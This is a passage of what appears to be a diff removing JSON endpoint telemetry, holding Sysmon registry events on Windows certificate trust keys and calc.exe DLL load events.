"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "twinui.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinui.appcore.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573244960000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573246980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573246980000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ExtendViewIntoTitleBar", - "registry_value": "ExtendViewIntoTitleBar", - "timestamp": 131883573246980000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573245270000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - 
"image_name": "BCP47mrm.dll", - "image_path": "C:\\Windows\\System32\\BCP47mrm.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "Windows.UI.dll", - "image_path": "C:\\Windows\\System32\\Windows.UI.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246360000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246360000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 